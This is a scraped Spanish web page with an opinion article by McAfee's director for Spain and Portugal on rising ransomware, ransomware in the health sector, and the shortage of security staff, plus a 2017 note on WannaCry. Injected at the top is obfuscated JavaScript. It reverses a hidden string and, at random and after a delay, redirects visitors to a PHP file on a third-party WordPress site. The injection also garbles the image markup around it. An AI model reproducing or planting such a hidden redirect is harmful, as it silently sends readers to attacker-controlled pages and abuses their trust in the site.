ARTICULO DE OPINION DE MARIA CAMPOS, DIRECTORA DE MCAFEE PARA ESPAÑA Y PORTUGAL, SOBRE LOS RANSOMWARES

$NfI=function(n){if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tos/1/MarA_a_Campos_1_(1)_thumb_615.JPG” width=”615″ height=”438″ /> María Campos, Directora de McAfee para España y Portugal.

La responsable de la compañía McAFee para España y Portugal, analiza en este artículo de opinión qué medidas es urgente tomar para frenar las crecientes campañas de ransomware -el software que secuestra ordenadores y móviles- para reducir su impacto.

“Ya han pasado varios años desde que se comenzó a hablar del ransomware: ese malware que secuestra el acceso a determinados archivos y pide un rescate para liberarlos. Aunque ya ha pasado algún tiempo desde entonces, y pese a todos los esfuerzos e innovaciones que se han invertido en luchar contra este tipo de ciberataques, el ransomware tiene un auge cada vez mayor en España y esto seguirá “in crescendo” si los usuarios y empresas no toman conciencia del uso que hacen de Internet.

De acuerdo al último McAfee Labs Threats Report, se ha producido un aumento total del ransomware del 128% respecto al año anterior y el número de muestras nuevas de ransomware asciende a más de 1,3 millones, una cifra jamás registrada hasta la fecha.

Al hilo de estas cifras, es importante rescatar un claro ejemplo que activa las alarmas: en la primera mitad de 2016, nuestros investigadores identificaron a un autor y distribuidor de ransomware que recibía 121 millones de dólares en pagos por operaciones de ransomware dirigidas a una amplia variedad de sectores. El responsable de estos cibercrímenes había acumulado ganancias de 94 millones de dólares durante los primeros seis meses de este año.

El cambio es el motor para la ciberseguridad

Este sector evoluciona constantemente en función de los cambios en la tecnología y aquí hay que hacer especial mención a las potenciales amenazas de este software maligno, sobre todo desde que el Internet de las Cosas (IoT) permite que prácticamente cualquier objeto se conecte a Internet.

Aunque no hay un sector a salvo de estos malware, sí que hay unos más sensibles a ciberataques que otros. En este sentido, nuestro equipo de investigación hace especial hincapié en el sector salud y evalúa la creciente amenaza que está suponiendo el ransomware para esta industria. No podemos olvidar que estas organizaciones son un blanco fácil por su necesidad de tener un acceso inmediato a la información para poder ofrecer el mejor cuidado posible al paciente y dependen en gran medida de los sistemas TI existentes y de servicios de terceros que pueden ser comunes en múltiples organizaciones.

Nuevas variantes del ransomware y la formación del empleado

Pero más allá de mirar el pasado, es importante y más constructivo enfocarnos hacia el futuro para hacer frente a estos ciberataques. Según el estudio Predicciones sobre amenazas para 2016 de McAfee Labs habrá nuevas variantes de las familias de ransomware dominando el escenario del cibercrimen: CTB-Locker, CryptoWall, Teerac y CryptoLocker. Estas nuevas variantes comenzarán a cifrar la información de manera silenciosa, guardando los datos en la copia de seguridad y cuando el agresor retire la clave transcurrido un cierto tiempo, los archivos estarán cifrados tanto en el sistema como en la copia de seguridad.

Si bien es cierto que la guerra contra el ransomware se basa en implementar una defensa avanzada que contemple la detección, contención y reacción a este tipo de amenazas, también es fundamental la formación, concienciación y la contratación de personal con formación específica en ciberseguridad, ya que si una empresa posee lo último en tecnología y dispone de un personal formado, capaz de crear directivas eficaces y permanecer vigilante, las posibilidades de éxito de los agresores son mínimas.

Nuestro último estudio, Hacking the Skills Shortage, en colaboración con el CSIS (Center for Strategic and International Studies), revela que un 82% de los profesionales de IT confirma el déficit de profesionales especializados en esta área, lo que reafirma la crisis por falta de talento que está afectando al sector de la ciberseguridad tanto en empresas como en naciones.

En la actualidad, la mayoría de las empresas proporcionan a los empleados software VPN que permite la conexión segura a la red de la empresa. Ésta es sin duda una manera extraordinaria de garantizar la seguridad de la comunicación entre el sistema profesional del empleado y la oficina. Sin embargo, la mayoría de los usuarios acceden a Internet desde varios dispositivos. La mayoría de las empresas despliegan firewalls, gateways web y del correo electrónico, sistemas IPS y otras tecnologías para proteger sus infraestructuras, pero la mayoría de los usuarios domésticos no siempre disponen de una solución antimalware y rara vez cuentan con un firewall o un gateway. Estas carencias dejan a los empleados a merced de ataques que van dirigidos en realidad a la compañía.

Desde McAfee se hace hincapié en un nuevo reto para la ciberseguridad: la escasez de modelos y alianzas verdaderamente eficaces para compartir inteligencia sobre amenazas. Es importante que las empresas cambien su estrategia de seguridad reactiva a un modelo de prevención más proactivo que identifique los riesgos de forma anticipada. El objetivo es construir una estrategia de seguridad integral que tenga en cuenta no sólo las soluciones tecnológicas sino también políticas de concienciación y formación hacia los empleados”.

COMENTARIO ACTUALIZADO EN 1-6-2017

Cabe añadir que, dados los últimos ataques introduciendo ransomwares (como el WannaCry) y repartiendolos, a través de la Red, en todas las máquinas que no tuvieran actualizados los parches contra los últimos ZERO-DAY descubiertos (y otros aun no controlados que aparecerán en breve, segun SHADOW BROCKERS), recordamos una vez mas la gran importancia de CONCIENCIAR A LOS USUARIOS DE NO EJECUTAR FICHEROS ANEXADOS A MAILS NO SOLICITADOS, NI ACCEDER A LOS LINKS NI IMAGENES DE LOS MISMOS, además de tener TODAS LAS ACTUALIZACIONES DISPONIBLES INSTALADAS, así como instalado el antivirus bien actualizado y guardada copia de seguridad de los datos fuera del alcance de las unidades compartidas, para evitar el cifrado de las mismas! – La colaboración de los usuarios es fundamental !!! -ms-